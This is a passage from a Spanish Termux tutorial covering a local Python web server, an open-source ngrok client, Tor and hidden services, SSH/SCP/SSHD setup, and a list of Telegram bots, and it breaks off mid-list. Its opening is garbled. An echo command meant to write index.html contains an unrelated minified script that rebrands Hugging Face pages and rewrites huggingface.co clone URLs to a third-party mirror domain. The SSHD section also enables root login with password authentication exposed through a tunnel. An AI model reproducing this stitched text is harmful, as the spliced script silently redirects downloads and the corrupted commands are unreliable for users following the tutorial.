{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'OCR模型免费转Markdown' && linkText !== 'OCR模型免费转Markdown' ) { link.textContent = 'OCR模型免费转Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== '模型下载攻略' ) { link.textContent = '模型下载攻略'; link.href = '/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'OCR模型免费转Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \" > index.html\n```\n\nEl primer comando nos lleva al directorio \"mywebsite\". El segundo comando crea un archivo llamado \"index.html\" en el directorio actual y agrega el código HTML necesario para mostrar un encabezado \"Mi sitio web\" en nuestra página.\n\n**4. Agregar un archivo de texto de ejemplo:**\n\nPara agregar un archivo de texto de ejemplo, ejecuta los siguientes comandos:\n\n```bash\necho \"Este es un archivo de texto de ejemplo.\" > example.txt\n```\n\nEste comando crea un archivo de texto llamado \"example.txt\" en el directorio actual y agrega el texto \"Este es un archivo de texto de ejemplo.\" en el archivo.\n\n**5. Iniciar el servidor web:**\n\nAhora que hemos creado nuestra carpeta y nuestros archivos, podemos iniciar el servidor web utilizando el comando `python3 -m http.server`. Para ello, ejecuta los siguientes comandos:\n\n```bash\npython3 -m http.server 8000\n```\n\nEl comando inicia el servidor web en el puerto 8000 (puedes elegir cualquier otro puerto si lo deseas).\n\n**6. Acceder a la página web:**\n\nPara acceder a la página web, abre un navegador en tu dispositivo Android y escribe la siguiente dirección URL:\n\n```\nhttp://localhost:8000/\n```\n\nDeberías ver la página web con el encabezado \"Mi sitio web\".\n\n**7. Acceder al archivo de texto:**\n\nPara acceder al archivo de texto, abre un navegador en tu dispositivo Android y escribe la siguiente dirección URL:\n\n```\nhttp://localhost:8000/example.txt\n```\n\nDeberías ver el contenido del archivo de texto \"example.txt\".\n\n¡Listo! Ahora tienes un servidor web en ejecución en tu dispositivo Android, creado con Python 3 en Termux. Puedes personalizar la página web agregando más contenido y archivos a la carpeta \"mywebsite\".\n\nEn el final del [Capítulo 25: Protocolo HTTP](#cap%C3%ADtulo-25-protocolo-http) también tienes un servidor web mínino usando Bash y ncat. \n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n## Capítulo 19: Ngrok y Exponer Servicios\n\n#### Qué es Ngrok?\n\nNgrok es una herramienta que permite crear un túnel seguro hacia un servidor local, lo que permite exponer aplicaciones o servicios que se ejecutan en un equipo local a Internet. Básicamente, permite que una aplicación web que se ejecuta en un equipo local sea accesible a través de una URL pública. Esto es muy útil para desarrolladores que necesitan probar sus aplicaciones web en diferentes dispositivos o compartir sus aplicaciones con otros.\n\nNgrok crea una conexión segura entre su equipo local y la nube, lo que le permite acceder a su servidor local desde cualquier lugar del mundo. También proporciona un panel de control web para administrar su conexión y configurar diferentes opciones, como la autenticación y el registro de solicitudes.\n\nNgrok es fácil de usar y se puede instalar en diferentes sistemas operativos. Además, tiene una versión gratuita y varias opciones de pago con características adicionales, como el uso de subdominios personalizados y la asignación de puertos dedicados.\n\n#### Qué es un servicio local y cómo se expone?\n\nUn servicio local es un servicio o aplicación que se ejecuta en un equipo local, como una aplicación web, una API o un servidor de base de datos. Estos servicios suelen estar disponibles solo en el equipo donde están instalados y no son accesibles desde otros equipos en la red o desde Internet. \n \nLos usuarios pueden utilizar Ngrok para exponer estos servicios locales y hacerlos accesibles desde cualquier lugar del mundo a través de una URL pública. Esto es útil para desarrolladores que necesitan probar sus aplicaciones en diferentes dispositivos o compartir sus aplicaciones con otros, ya que les permite acceder a sus servicios locales sin tener que exponerlos a Internet directamente. Además, Ngrok facilita la configuración de conexiones seguras y elimina la necesidad de abrir puertos en el router, lo que lo hace una solución fácil y segura para exponer servicios locales.\n\n#### Por que utilizar una versión opensource en lugar de la oficial\n\nLa seguridad es un factor importante cuando se trata de exponer servicios a través de Internet. Mientras que Ngrok es una herramienta popular y útil para crear túneles seguros y exponer servicios locales, algunos usuarios pueden tener preocupaciones sobre la seguridad de su código cerrado y la privacidad de sus datos.\n\nUna de las ventajas de utilizar una versión de Ngrok de código abierto (open source) es que cualquier persona puede revisar y auditar el código para detectar posibles vulnerabilidades y problemas de seguridad. Esto significa que hay una mayor transparencia y confianza en el software, ya que los usuarios pueden ver exactamente lo que está sucediendo en el código subyacente.\n\nAdemás, los desarrolladores de la versión open source de Ngrok pueden responder a las preocupaciones de seguridad de la comunidad y proporcionar soluciones rápidas en caso de que se descubran vulnerabilidades. También hay una comunidad de usuarios activa que puede proporcionar soporte y asistencia en caso de que surjan problemas.\n\nPor otro lado, al ser una versión cerrada de código (closed source), los usuarios no pueden revisar el código y tienen que confiar en que la empresa detrás de Ngrok está tomando las medidas de seguridad necesarias para proteger sus datos y privacidad.\n\nEn conclusión, utilizar una versión open source de Ngrok proporciona una mayor transparencia y seguridad, ya que los usuarios pueden revisar el código y confiar en la comunidad de usuarios para solucionar posibles vulnerabilidades y problemas de seguridad.\n\n#### cómo instalar un cliente de ngrok opensource\n\n1. Abre la aplicación Termux en tu dispositivo Android.\n\n2. Instala las dependencias necesarias ejecutando el siguiente comando:\n\n ```bash\n pkg install openssh tmux\n ```\n\n3. Descarga el cliente de ngrok opensource en tu dispositivo Android ingresando el siguiente comando:\n\n ```bash\n git clone https://github.com/stringmanolo/ngrok.git\n ```\n\n4. Navega hasta el directorio donde se encuentra el cliente de ngrok ingresando el siguiente comando:\n\n ```bash\n cd ngrok\n ```\n\n5. Configura el cliente de ngrok utilizando el asistente ingresando el siguiente comando:\n\n ```bash\n chmod 775 ngrokWizard.sh\n ./ngrokWizard.sh\n ```\n\n Sigue las instrucciones que se muestran en pantalla para configurar el cliente de ngrok. Esto incluirá generar una clave pública ECDSA, pegar la clave en la página de configuración de ngrok y establecer el puerto de tu servidor.\n\n6. Una vez que hayas configurado el cliente de ngrok utilizando el asistente, puedes iniciar y detener el cliente utilizando los siguientes comandos:\n\n ```bash\n ./ngrokStart.sh\n ```\n\n y\n\n ```bash\n ./ngrokStop.sh\n ```\n\n El primer comando iniciará el cliente de ngrok y establecerá una conexión inversa SSH con el servidor, lo que permitirá que el tráfico se reenvíe a través de ngrok. El segundo comando detendrá la conexión SSH y cerrará el cliente de ngrok.\n\n Asegúrate de establecer el puerto correcto cada vez que ejecutes el comando `ngrokStart.sh`.\n\nAhora puedes usar el cliente de ngrok opensource para exponer tu servidor web a través de ngrok en tu dispositivo Android usando Termux. Recuerda que la URL pública que te proporciona ngrok cambiará cada vez que ejecutes el comando `ngrokStart.sh`, por lo que es posible que debas actualizar la URL que compartes con otros usuarios cada vez que la uses.\n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n## Capítulo 20: Tor, Configuración y Uso\n\n#### Qué es Tor?\nTor (The Onion Router) es una red de comunicaciones en línea diseñada para proporcionar anonimato y privacidad a los usuarios de Internet. Fue desarrollado originalmente por la Marina de los Estados Unidos para proteger las comunicaciones gubernamentales, pero posteriormente se convirtió en un proyecto de código abierto para permitir que cualquier persona pueda utilizarlo.\n\nTor funciona enrutando las conexiones de Internet a través de una serie de nodos (también llamados \"nodos de cebolla\" o \"onion routers\") distribuidos por todo el mundo. Cada nodo en la red solo conoce la dirección IP del nodo anterior y el siguiente nodo en la cadena, lo que hace que sea difícil (aunque no imposible) rastrear las comunicaciones de un usuario de Internet.\n\nAdemás, Tor también utiliza técnicas de cifrado para proteger las comunicaciones y garantizar que solo el usuario final pueda leer el contenido de los mensajes. Esto hace que Tor sea una herramienta valiosa para aquellos que desean proteger su privacidad y anonimato en línea, ya sea por razones políticas, de seguridad o simplemente por preferencia personal.\n\n#### Instalación, configuración y uso\n\n##### 1 Abre Termux y asegúrate de que estás en la última versión actualizada. Para actualizar, escribe en la terminal:\n\n```bash\napt update && apt upgrade\n```\n\n##### 2 A continuación, es necesario instalar el paquete de Tor y torify. Para hacerlo, escribe en la terminal:\n\n```bash\npkg install tor torsocks\n```\n\n##### 3 Añade las siguientes líneas al archivo de configuración de Tor, usando el comando `echo`:\n\n```bash\necho 'ControlPort 9051' >> $PREFIX/etc/tor/torrc && echo 'CookieAuthentication 1' >> $PREFIX/etc/tor/torrc\n```\n\n##### 4 Inicia el servicio de Tor en background usando el ampersand:\n\n```bash\ntor &\n```\n\nNota: El ampersand al final del comando permite que el proceso se ejecute en segundo plano, lo que significa que puedes seguir utilizando la terminal mientras Tor está activo.\n\n##### 5 Para asegurarte de que Tor está funcionando, ejecuta:\n\n```bash\ntorify curl -s https://check.torproject.org/ | grep -q \"Congratulations\"\n```\n\nEste comando debería mostrar un mensaje de felicitación si estás usando Tor. Si no ves el mensaje, es posible que algo esté mal configurado o que Tor no esté funcionando correctamente.\n\n##### 6 Ahora puedes usar Tor con cualquier aplicación que soporte proxies SOCKS5, incluyendo `curl`. Simplemente precede cualquier comando que quieras ejecutar con `torsocks`. Por ejemplo:\n\n```bash\ntorsocks curl https://example.com\n```\n\n##### 7 Cuando hayas terminado de usar Tor, detén el servicio ejecutando el siguiente comando:\n\n```bash\nkillall tor\n```\n\n¡Listo! Ahora sabes cómo instalar, configurar y usar Tor en Termux. Recuerda que el uso de Tor es importante para proteger tu privacidad y anonimato en línea.\n\n\t\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n## Capítulo 21: Servicios Ocultos\n\n### Qué es?\nUn Hidden Service (también conocido como Servicio Oculto) es un sitio web alojado en la red Tor (conocida también como Dark Web o internet profunda) que se encuentra en una ubicación desconocida para los usuarios normales de la web y que solo puede ser accedido a través de la red Tor. En lugar de tener una dirección IP pública y estar alojado en un servidor web estándar, un Hidden Service se aloja en una red anónima y utiliza una dirección web única que termina en \".onion\".\n\nCuando un usuario intenta acceder a un sitio web alojado en un Hidden Service, su conexión se enruta a través de una serie de nodos de la red Tor, lo que proporciona un alto nivel de anonimato.\n\nLos Hidden Services se pueden utilizar para una amplia variedad de propósitos, desde sitios web de periodismo y activismo político hasta mercados en línea y comunidades en línea privadas. Algunos usuarios también utilizan Hidden Services para alojar sus propios sitios web personales sin revelar su ubicación física o dirección IP pública.\n\nEn resumen, los Hidden Services ofrecen una forma segura y anónima de alojar y acceder a contenido en línea, lo que los hace útiles para una variedad de aplicaciones en línea que requieren privacidad y anonimato.\n\n### Crear un servicio oculto\n\n##### 1 Crea una carpeta para el sitio web y otra para el hidden service utilizando los siguientes comandos:\n\n```bash\nmkdir -p $PREFIX/var/lib/tor/hidden_service/mywebsite;\nmkdir -p $PREFIX/etc/tor/hidden_service;\n```\n\n##### 2 Cambia los permisos de la carpeta: \n```bash \nchmod 700 $PREFIX/var/lib/tor/hidden_service/mywebsite\n```\n\n##### 3 Agrega las líneas de configuración de Tor al archivo `torrc` utilizando el siguiente comando:\n\n```bash\necho -e \"HiddenServiceDir $PREFIX/var/lib/tor/hidden_service/mywebsite\\nHiddenServicePort 80 127.0.0.1:8000\" >> $PREFIX/etc/tor/torrc;\n```\n\n##### 4 Reinicia el servicio Tor ejecutando el siguiente comando:\n\n```bash\nkillall tor;\ntor &\n```\n\n##### 5 Crea un archivo `index.html` para el sitio web utilizando el siguiente comando:\n\n```bash\necho \"Hello, world!\" > $PREFIX/var/lib/tor/hidden_service/mywebsite/index.html;\n```\n\n##### 6 Inicia un servidor web local en la carpeta `mywebsite` usando el siguiente comando:\n\n```bash\ncd $PREFIX/var/lib/tor/hidden_service/mywebsite;\npython3 -m http.server 8000 &\n```\n\n##### 7 Obten la dirección de tu servicio:\n```bash\ncat $PREFIX/var/lib/tor/hidden_service/mywebsite/hostname\n```\n\n##### 8 Accede al sitio web a través del Hidden Service ejecutando el siguiente comando en la terminal:\n```bash\ntorify curl http://.onion/;\n```\n\nReemplaza `` con la dirección del Hidden Service que obtuviste en el paso 7.\n\nOtra forma de comprobar si funciona es utilizando el servicio tor2web. Te vas a [este](https://www.tor2web.fi/) enlace en cualquier navegador e introduces la dirección de tu servicio. Si funciona verás tu página web con el mensaje \"Hello World\". Esta web sirve para poder visualizar páginas web alojadas en la red tor en tu navegador sin necesidad de instalar el navegador de tor. \n\n##### 9 Para detener el servicio Tor y el servidor web de Python, ejecuta los siguientes comandos en la terminal:\n```bash\nkillall tor;\nkillall python3;\n```\n\nCon estos pasos, se creará una carpeta para el sitio web y otra para el hidden service, se configurará el archivo de Tor para exponer el servidor web local en el Hidden Service, se creará un archivo `index.html` para el sitio web y se iniciará un servidor web local. Cualquier persona con conexión a tor podrá acceder a tu servicio utilizando el dominio .onion.\n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n\n## Capítulo 22: SSH, SCP y SSHD\n\n### SSH\n\nSSH (Secure Shell) es un protocolo de red que permite a los usuarios acceder y controlar de forma remota otros dispositivos a través de una conexión segura. En Termux, también es posible utilizar SSH para establecer una conexión remota con otros sistemas y ejecutar comandos en ellos. A continuación, te mostraré cómo puedes utilizar SSH en Termux.\n \n#### Instalación de OpenSSH\nPara utilizar SSH en Termux, primero debes instalar el paquete OpenSSH. Puedes hacerlo ejecutando el siguiente comando en la terminal de Termux:\n\n```bash\npkg install openssh\n```\n\n#### Generación de claves SSH\nAntes de utilizar SSH, es recomendable generar un par de claves SSH para autenticarte de forma segura en los sistemas remotos. Puedes generar un par de claves SSH ejecutando el siguiente comando:\n\n```bash\nssh-keygen -t rsa\n```\n\nEste comando generará una clave privada y una clave pública en tu directorio de inicio. Puedes dejar los valores predeterminados presionando \"Enter\" en cada pregunta.\n\n\n#### Conexión SSH\nUna vez que hayas generado las claves SSH, estás listo para establecer una conexión SSH con un sistema remoto. Utiliza el siguiente comando para conectarte a un sistema remoto\n```bash\nssh usuario@dirección_ip\n```\n\nReemplaza \"usuario\" con tu nombre de usuario en el sistema remoto y \"dirección_ip\" con la dirección IP del sistema remoto al que deseas conectarte, también puedes usar un dominio en lugar de una IP al igual que con las páginas web.\n\nSi es la primera vez que te conectas a ese sistema, se te pedirá que confirmes la autenticidad de la clave del host. Verifica que la clave mostrada coincida con la clave del sistema remoto y responde \"yes\" para agregarla a la lista de conocidos.\n\nA continuación, se te solicitará la contraseña del usuario remoto. Ingrésala y presiona \"Enter\" para establecer la conexión\n\nNormalmente ssh se utiliza para obtener acceso a servidores privados pero también hay alguno público. En el siguiente ejemplo veremos como utilizar openssh para conectarnos a un servidor remoto:\n```bash\nssh bandit0@bandit.labs.overthewire.org -p 2220\n```\n\nCuando te conectas por SSH por primera vez a un servidor es normal que se te muestre un mensaje indicando la huella digital del servidor, por ejemplo:\n```bash\nThe authenticity of host '[bandit.labs.overthewire.org]:2220 ([16.16.8.216]:2220)' can't be established.\nED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes/no/[fingerprint])?\n```\n\nEscribiremos **yes** para continuar la conexión.\n\nLo que estamos haciendo es conectarnos al ordenador con dirección IP 16.16.8.216 usando el protocolo SSH con el usuario bandit0. Nos pedirá una contraseña que también es bandit0. Y con esto ya nos hemos conectado a un ordenador remoto a través de SSH. \n\nSi tienes multiples dispositivos, smartphones, computadores, hostings, vpns, ... SSH es una forma segura y simple de obtener una terminal remota. En esta parte se explica solo el cliente (como conectarse a), a continuación se explica como configurar el servicio ssh para que una maquina sea accesible a través de SSH. \n\n### SSHD \n\nSSHD es el Daemon de SSH que se ejecuta en segundo plano permaneciendo a la escucha de conexiones entrantes (por defecto en el puerto 8022 en Termux). Este servicio nos sirve para permitir que la máquina sea controlada desde el exterior a través del protocolo SSH.\n\n##### Instalar Alpine en proot-distro\nEn lugar de correr directamente el servidor SSH sobre Termux, vamos a hacerlo sobre proot-distro con el argumento --isolated para tener una pequeña capa extra de seguridad. Ya vimos como utilizar la herramienta proot-distro en el [capítulo 11](#cap%C3%ADtulo-11-proot-distro): \n```bash\nproot-distro install alpine\n```\n\n##### Iniciar sesión interactiva aislada de Alpine\n\nA continuación, utilizaremos proot-distro para iniciar sesión en la distribución Alpine Linux de forma aislada. Ejecutamos el siguiente comando:\n```bash\nproot-distro login alpine --isolated\n```\n\n##### Instalar openssh en Alpine\n\nUna vez que hemos iniciado sesión en la distribución Alpine Linux, podemos instalar el paquete de OpenSSH, que nos permitirá configurar el servidor SSHD. Ejecutamos el siguiente comando:\n```bash\napk add openssh\n```\n\n##### Generación de claves SSH\n\nAntes de configurar el servidor SSHD, necesitamos generar las claves SSH necesarias. Ejecutamos el siguiente comando:\n\n```bash\nssh-keygen -A\n```\n\n##### Creae archivo de configuración de SSHD\n\nEste comando sobrescribe el contenido del archivo /etc/ssh/sshd_config con la configuración especificada. Aquí estamos permitiendo el inicio de sesión como usuario root, configurando el puerto de escucha en el puerto 8022, habilitando la autenticación por contraseña y desactivando algunas opciones de reenvío y redireccionamiento.\n\n```bash\necho 'Include /etc/ssh/sshd_config.d/*.conf\nPort 8022\nPermitRootLogin yes\nAuthorizedKeysFile .ssh/authorized_keys\nPasswordAuthentication yes\nAllowTcpForwarding no\nGatewayPorts no\nX11Forwarding no\nSubsystem sftp internal-sftp' > /etc/ssh/sshd_config\n```\n\n##### Generación de una contraseña para el usuario root\nPara habilitar el inicio de sesión como usuario root, necesitamos establecer una contraseña. Ejecutamos el siguiente comando:\n\n```bash\ntr -dc '[:alnum:][:punct:]' < /dev/urandom | head -c 16\n```\n\nEste comando genera una contraseña aleatoria de 16 caracteres para el usuario root. Puedes utilizar cualquier contraaeña que tu quieras, pero debes tener en cuenta que hay miles de scanneres y herramientas de fuerza bruta scanneando servicios SSH. Si pones una contraseña frágil, te van a hackear y podrán ejecutar comandos en tu dispositivo. \n\n##### Establecimiento de la contraseña del usuario root\nAhora, estableceremos la contraseña generada para el usuario root. Ejecutamos el siguiente comando:\n```bash\npasswd root\n```\n\nEste comando solicitará que ingresemos la nueva contraseña para el usuario root.\n\n##### Inicio del servidor SSHD\nFinalmente, iniciamos el servidor SSHD ejecutando el siguiente comando:\n\n```bash\n/usr/sbin/sshd\n```\n\n##### Conexión al servidor SSHD\nAhora que hemos configurado y activado el servidor SSHD, podemos conectarnos a él desde otras máquinas (pcs, smartphones, etc) y/o otras terminales. Utilizamos el comando ssh para establecer una conexión SSH. \n\n###### Para conexión desde otra pestaña de Termux u otro software en el mismo equipo:\n```bash\nssh root@127.0.0.1 -p 8022\n```\n\n###### Para conexión desde otra maquina que se encuentre en la misma red local (mismo wi-fi) \n```bash\nssh root@192.168.1.40 -p 8022\n```\n__Remplaza la IP 192.168.1.40 por la IP privada que el router te asignó (IP local de tu Smartphone)__ \n\n###### Para conexión desde fuera de nuestra red (cualquier máquina en cualquier parte, con router en casa)\n```bash\nssh root@93.184.216.34 -p 8022\n``` \n__Remplaza la IP 93.184.216.34 por la IP pública de tu router y configura en el router la apertura/redirección de puertos de la IP pública hacia la IP local de tu Smartphone__\n\n###### Para conexión desde fuera de nuestra red (cualquier máquina en cualquier parte, datos móviles o no)\nSi utilzas datos móviles normalmente los proveedores de internet no te dan una IP pública única ni tampoco un router o una forma de abrir puertos, si no que te meten en una red compartida llamada CGNAT. Cuando estás en CGNAT no puedes exponer ningún tipo de servicio a internet. Para exponer nuestro servidor SSH lo que haremos será utilizar un servidor intermedio que encapsule el trafico mediante técnicas de tunelación. __Esta técnica funciona también aunque no uses datos móviles, asique si simplemente quierer ahorrarte abrir puertos, o tienes cualquier otro motivo también te sirve__ \n\nEn el [Capítulo 19: Ngrok y Exponer Servicios](#cap%C3%ADtulo-19-ngrok-y-exponer-servicios) tienes mas información.\n\n\n##### Instalar git\n\nInstalamos git para poder clonar el repositorio de un cliente código abierto de Ngrok\n\n```bash\napk add git\n```\n\n##### Instalar tmux\n\nInstalamos también tmux ya que es una dependencia del cliente codigo abierto de ngrok \n\n```bash\napk add tmux\n```\n\n##### Instalar ngrok opensource\n```bash\ngit clone https://github.com/StringManolo/ngrok;\ncd ngrok;\nchmod 775 ngrokWizard.sh;\nchmod 775 ngrokStart.sh;\nchmod 775 ngrokStop.sh;\n./ngrokWizard.sh;\n\n```\n\nLee y sigue las indicaciones que se muestran en consola para configurar y ejecutar ngrok. \n\nUna vez completado el proceso, en la salida de consola te saldrá un url con protocolo tcp acompañado de un puerto, por ejemplo: __tcp://8.tcp.ngrok.io:16459__ \n\nPodremos conectarnos a nuestra máquina al igual que hicimos en local pero ahora desde cualquier lugar/dispositivo;\n\n```bash\nssh root@8.tcp.ngrok.io -p 16459\n```\n\nPuedes cerrar todo simplemente corriendo el comando __exit__ \n\nPara volver a activar el SSH ngrok y demás no necesitarás repetir todo el proceso, simplemente ingresas al Alpine linux, ejecutas el ssh y el ./ngrokStart.sh, pones el puerto 8022 y listo:\n```bash\nproot-distro login alpine --isolated\n```\n\n```bash\n/usr/sbin/sshd;\n/root/ngrok/ngrokStart.sh;\n```\n\n### SCP\n\nSCP (Secure Copy) es un protocolo basado en SSH que permite la transferencia segura de archivos entre sistemas remotos. Con SCP, puedes copiar archivos y directorios de forma segura de un sistema a otro.\n\n##### Copiar archivos desde el sistema local al sistema remoto\nPara copiar archivos desde el sistema local al sistema remoto utilizando SCP, utiliza el siguiente comando:\n```bash\nscp miArchivo.txt root@127.0.0.1:/home/archivos -p 8022\n```\n\nEl comando te pedirá la contraseña del usuario remoto. Ingrésala y presiona \"Enter\" para iniciar la transferencia del archivo.\n\n##### Copiar archivos desde el sistema remoto al sistema local\nPara copiar archivos desde el sistema remoto al sistema local utilizando SCP, utiliza el siguiente comando:\n```bash\nscp root@127.0.0.1:/home/archivos/logServidor.txt ~/logs/ -p 8022\n\n```\n\n##### Copiar directorios recursivamente\nPara copiar un directorio completo de forma recursiva desde el sistema local al sistema remoto o viceversa, utiliza el siguiente comando:\n```\nscp -r fotos root@127.0.0.1:/home/imagenes\n```\n\n\n[Tabla de Contenidos](#tabla-de-contenidos)\n\n----\n\n\n## Capítulo 23: Bots de Telegram\nTelegram es una app de mensajería que puede resultar de gran utilidad para desarrolladores y hackers, en parte gracias a los bots. \n \nLos bots son programas normales pero con la capacidad añadida de que pueden usar telegram. Esto te permite enviar texto desde telegram a tu dispositivo y viceversa, esto nos da infinitas posibilidades.\n\n##### Listado de bots útiles: \n- [Conversor De Archivos](https://t.me/newfileconverterbot) \nLe pasas un archivo y te lo convierte a otro formato. Soporta 874 formatos. \n- [Email Temporal DropMail](https://t.me/DropMailBot) \nTe da emails temporales que duran 10 minutos. \n- [Email Temporal TempMail](https://t.me/TempMail_org_bot) \nOtro bot de email temporales. \n- [Email Mailable](https://t.me/mailableBot) \nEste bot the permite crear tu dirección de correo, mandar y recibir correos desde Telegram \n- [GMAIL](https://t.me/GmailBot) \nBot oficial de gmail. Te llevan los emails a telegram y puedes contestarles, enviar correos, etc. \n- [Subir Archivos AnonFile](https://t.me/anonfileuploaderbot) \nTe permite subir archivos a anonfiles.com desde telegram y te da el enlace de descarga\n- [Traductor De Idiomas](https://t.me/BabelgramBot) \nTraduce conversaciones entre distintos idiomas. \n- [Imagenes de mapas y satellites](https://t.me/openmap_bot) \nLe introduces una dirección y te da una imagen de la zona. \n- [Convierte audios a texto](https://t.me/TranscribeME_bot) \nLe mandas un audio y te da en texto lo que dice la persona. \n- [Obten el texto de imágenes](https://t.me/TexifyBot) \nLe mandas una imagen y te da el texto que salga en ella. \n- [Convierte texto a voz](https://t.me/text_to_speach_bot) \nLe mandas un texto y te 